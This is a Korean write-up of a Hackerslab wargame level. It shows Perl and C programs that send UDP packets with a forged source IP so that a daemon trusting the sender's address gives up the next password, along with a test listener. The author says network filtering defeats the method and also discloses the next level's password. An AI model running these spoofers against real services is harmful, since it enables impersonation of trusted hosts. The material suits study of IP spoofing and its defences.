현재 해킹 자유지대 서버에는 특정 데몬이 떠 있다. 이 데몬은 UDP 5555번 포트를 이용하는데 www.hackerslab.org 호스트로부터 레벨10의 패스워드와 이메일 주소가 담긴 패킷이 오면 그 email 주소로 level 11의 패스워드를 알려준다.
그 해당 포맷은 다음과 같다.
“Level10의 패스워드/email 주소”
Ex) level10 의 패스워드가 abcd 이고 email 주소가 abc@aaa.ccc.ddd.rr 이라면
“abcd/abc@aaa.ccc.ddd.rr”
반드시 www.hackerslab.org 로부터 패킷이 와야 성공할 수 있으니 주의하기 바란다.
——————-
참고자료
http://dries.studentenweb.org/apt/packages/perl-Net-RawIP/info.html
http://metawire.org/~prasanna/Papers%20and%20Articles/Sockets/Socket_Programming_Tutorial.html
http://www.w00w00.org/files/
결론부터 말하면 이 문제 제대로 안됩니다… 출발지 주소를 위조한 패킷은 중간 라우터가 다 걸러버리니까;; 열라 삽질하고 나서 그냥 구글님께 패스워드 물어보셔야합니다. level 11 비번은 Permission denied 입니다. (d가 대문자이던가;; 잘 모르겠음.)
Perl 버전 UDP Spoof
[root@protos tmp]# cat udpspoof.pl
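# udpspoof.pl
#
# Sends a single UDP datagram whose IP source address is written by hand
# instead of being filled in by the kernel.
#
# Context for the reader: the wargame daemon described above decides whether a
# request is legitimate from the source address of a UDP datagram alone. UDP
# has no handshake, so nothing in the protocol proves that address. Any reply
# goes to the real owner of the address, so this only suits one-way requests
# like this level. Networks that validate source addresses (BCP 38 /
# RFC 2827) drop such packets, which matches the author's remark that
# "the router filters everything".
#
# Changes from the pasted listing: the typographic quotes (not valid Perl
# string delimiters) are restored to plain ASCII quotes, strict/warnings are
# enabled, and the indirect-object "new Net::RawIP" call is written as a
# normal method call.
use strict;
use warnings;
use Net::RawIP;

my $DESTINATION      = "165.132.121.252";
my $DESTINATION_PORT = 5555;
my $SOURCE_PORT      = 200;
my $SPOOFED_SOURCE   = "211.239.123.39";
my $DATA             = "Beauty and Beast/pool0078\@hanmail.net";

# A Net::RawIP object with an (initially empty) UDP layer.
my $new_socket = Net::RawIP->new({ udp => {} });

# Fill in the IP and UDP header fields and the payload in one call.
$new_socket->set({
    ip  => { saddr => $SPOOFED_SOURCE, daddr => $DESTINATION, tos => 22 },
    udp => { source => $SOURCE_PORT, dest => $DESTINATION_PORT, data => $DATA },
});

$new_socket->send;
print "UDP Spoof done";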
C 버전 UDP Spoof
[root@protos tmp]# cat udp.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define IPHDRSIZE sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)
#define ERROR -1
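/*
 * in_cksum -- 16-bit one's-complement Internet checksum over `len` bytes
 * starting at `addr`.
 *
 * The 16-bit words are read in host memory order, so the returned value is
 * meant to be stored back into the header as-is (no htons()).
 *
 * Changes from the original K&R-style version:
 *   - ANSI prototype, so callers get their arguments type-checked and
 *     converted (the old definition silently accepted a size_t for `len`);
 *   - words are read with memcpy(), so a byte buffer that is not 2-byte
 *     aligned is handled without undefined behaviour;
 *   - the accumulator is unsigned and is folded whenever its top bit is set,
 *     so long inputs cannot overflow a signed int.
 *
 * `unsigned short *` is the same type the original spelled as `u_short *`.
 */
unsigned short in_cksum(unsigned short *addr, int len)
{
    const unsigned char *p = (const unsigned char *)addr;
    unsigned long sum = 0;
    unsigned short word;

    /* Add up the complete 16-bit words. */
    while (len > 1) {
        memcpy(&word, p, sizeof word);
        sum += word;
        /* Fold early so the accumulator never loses a carry. */
        if (sum & 0x80000000UL)
            sum = (sum & 0xffffUL) + (sum >> 16);
        p += 2;
        len -= 2;
    }

    /* Mop up a trailing odd byte: it becomes the first byte of a zero-padded word. */
    if (len == 1) {
        word = 0;
        *(unsigned char *)&word = *p;
        sum += word;
    }

    /* Fold the carries out of the upper bits back into the low 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xffffUL) + (sum >> 16);

    /* One's complement, truncated to 16 bits. */
    return (unsigned short)(~sum & 0xffffUL);
}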
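/*
 * host2ip -- resolve a host name (or dotted-quad string) to an IPv4 address.
 *
 * Returns the address as stored in struct in_addr (network byte order).
 * On any failure a message is written to stderr and the process exits with
 * ERROR, as the original did.
 *
 * Changes from the original:
 *   - gethostbyname() does not set errno, so perror() printed an unrelated
 *     message; the failure is now reported with the name that failed;
 *   - the resolver result is checked to be an IPv4 address of the expected
 *     length before it is copied, instead of trusting h_length as the copy
 *     size into a 4-byte in_addr;
 *   - memcpy() replaces the legacy bzero()/bcopy(), and h_addr_list[0]
 *     replaces the non-standard h_addr alias.
 */
unsigned long int host2ip(char *serv)
{
    struct hostent *hent;
    struct in_addr addr;

    hent = gethostbyname(serv);
    if (hent == NULL) {
        fprintf(stderr, "gethostbyname: cannot resolve %s\n", serv);
        exit(ERROR);
    }

    /* Only copy what is known to be exactly one IPv4 address. */
    if (hent->h_addrtype != AF_INET ||
        hent->h_length != (int)sizeof(addr) ||
        hent->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname: no IPv4 address for %s\n", serv);
        exit(ERROR);
    }

    memcpy(&addr, hent->h_addr_list[0], sizeof(addr));
    return addr.s_addr;
}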
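/*
 * udp.c main -- build one IPv4 + UDP packet by hand and send it through a
 * raw socket with IP_HDRINCL set, so the IP header (including the source
 * address field) is taken from this buffer.
 *
 * Context for the reader: this only matters against a service that, like the
 * wargame daemon described above, treats the UDP source address as proof of
 * identity. Nothing in UDP verifies that field. Networks that apply
 * source-address validation (BCP 38 / RFC 2827) discard such packets, which
 * is the filtering the author reports running into.
 *
 * Changes from the pasted listing:
 *   - typographic quotes restored to plain ASCII quotes so it compiles;
 *   - socket() is checked, and setsockopt() failures are reported;
 *   - the payload length comes from strlen() instead of the literal 37, and
 *     is checked against the packet buffer;
 *   - the duplicated memcpy()/memset() calls are removed;
 *   - in_cksum() is called with the pointer type and int length it expects;
 *   - the destination sockaddr is zeroed before use.
 *
 * The addresses, ports, payload and header values are unchanged.
 */
int main(void)
{
    const char *datagram = "Beauty and Beast/**********@gmail.com";
    const size_t datasize = strlen(datagram);
    const size_t pktlen = IPHDRSIZE + UDPHDRSIZE + datasize;
    const unsigned short s_port = 6666;
    const unsigned short d_port = 5555;
    unsigned long src_addr = inet_addr("211.239.123.39");
    unsigned long dst_addr = inet_addr("211.239.123.40");
    unsigned char packet[1024];
    struct iphdr *ip = (struct iphdr *)packet;
    struct udphdr *udp = (struct udphdr *)(packet + IPHDRSIZE);
    unsigned char *data = packet + IPHDRSIZE + UDPHDRSIZE;
    struct sockaddr_in sin;
    ssize_t sent;
    int on = 1;
    int s;

    /* Refuse a payload that would not fit behind the two headers. */
    if (pktlen > sizeof(packet)) {
        fprintf(stderr, "payload too large for packet buffer\n");
        exit(ERROR);
    }

    /* Raw sockets need elevated privileges; report the reason on failure. */
    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s == ERROR) {
        perror("socket");
        exit(ERROR);
    }

    /* IP_HDRINCL: the IP header is supplied in the buffer handed to sendto(). */
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR) {
        perror("setsockopt");
        close(s);
        exit(ERROR);
    }

    memset(packet, 0, sizeof(packet));

    /* UDP header + payload. A zero checksum means "not computed" for UDP over IPv4. */
    udp->source = htons(s_port);
    udp->dest = htons(d_port);
    udp->len = htons((unsigned short)(UDPHDRSIZE + datasize));
    udp->check = 0;
    memcpy(data, datagram, datasize);

    /* IPv4 header: 5 words, no options. */
    ip->saddr = src_addr;
    ip->daddr = dst_addr;
    ip->version = 4;
    ip->ihl = 5;
    ip->ttl = 245;
    ip->id = random() % 5985;
    ip->protocol = 17;            /* UDP */
    ip->tot_len = htons((unsigned short)pktlen);
    ip->check = 0;                /* must be zero while the checksum is computed */
    ip->check = in_cksum((unsigned short *)packet, (int)IPHDRSIZE);

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = dst_addr;
    sin.sin_port = udp->dest;

    sent = sendto(s, packet, pktlen, 0, (struct sockaddr *)&sin, sizeof(sin));
    if (sent == ERROR) {
        perror("sendto");
        close(s);
        exit(ERROR);
    }

    printf("UDP sent.\n");
    close(s);
    return 0;
}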
정상동작하는지 확인을 위한 listener
[root@protos tmp]# cat listener.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MYPORT 5555 // the port users will be connecting to
#define MAXBUFLEN 100
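/*
 * listener.c main -- bind UDP port MYPORT, wait for one datagram, print where
 * it claims to come from and what it contains, then exit.
 *
 * Note for the reader: the address printed as "got packet from" is simply the
 * source field of the received datagram. UDP gives the receiver no way to
 * verify it, so it must not be used as proof of who sent the packet.
 *
 * Changes from the pasted listing:
 *   - typographic quotes restored to plain ASCII quotes so it compiles;
 *   - the address length passed to recvfrom() is a socklen_t, as the API
 *     requires, instead of an int;
 *   - both sockaddr structures are zeroed in full before use;
 *   - the payload is untrusted network data, so bytes outside printable ASCII
 *     are shown as \xNN instead of being written raw to the terminal, and
 *     embedded NUL bytes no longer cut the output short;
 *   - the socket is closed on the error paths as well.
 */
int main(void)
{
    int sockfd;
    struct sockaddr_in my_addr;    /* my address information */
    struct sockaddr_in their_addr; /* sender's address as claimed by the packet */
    socklen_t addr_len;
    ssize_t numbytes;
    ssize_t i;
    char buf[MAXBUFLEN];

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket");
        exit(1);
    }

    memset(&my_addr, 0, sizeof(my_addr));
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(MYPORT);            /* network byte order */
    my_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* listen on every local address */

    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) {
        perror("bind");
        close(sockfd);
        exit(1);
    }

    memset(&their_addr, 0, sizeof(their_addr));
    addr_len = sizeof(their_addr);

    /* MAXBUFLEN - 1 leaves room for the terminating NUL written below. */
    numbytes = recvfrom(sockfd, buf, MAXBUFLEN - 1, 0,
                        (struct sockaddr *)&their_addr, &addr_len);
    if (numbytes == -1) {
        perror("recvfrom");
        close(sockfd);
        exit(1);
    }
    buf[numbytes] = '\0';

    printf("got packet from %s\n", inet_ntoa(their_addr.sin_addr));
    printf("packet is %d bytes long\n", (int)numbytes);

    /* Escape anything that is not printable ASCII before it reaches the terminal. */
    printf("packet contains: [");
    for (i = 0; i < numbytes; i++) {
        unsigned char c = (unsigned char)buf[i];

        if (c >= 0x20 && c < 0x7f)
            putchar(c);
        else
            printf("\\x%02x", c);
    }
    printf("]\n");

    close(sockfd);
    return 0;
}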
또는 ifconfig ppp0 웹서버아이피 up 한뒤에 그냥 UDP 패킷 보내도 되나 보아요.. 근데 그건 저도 잘 모름.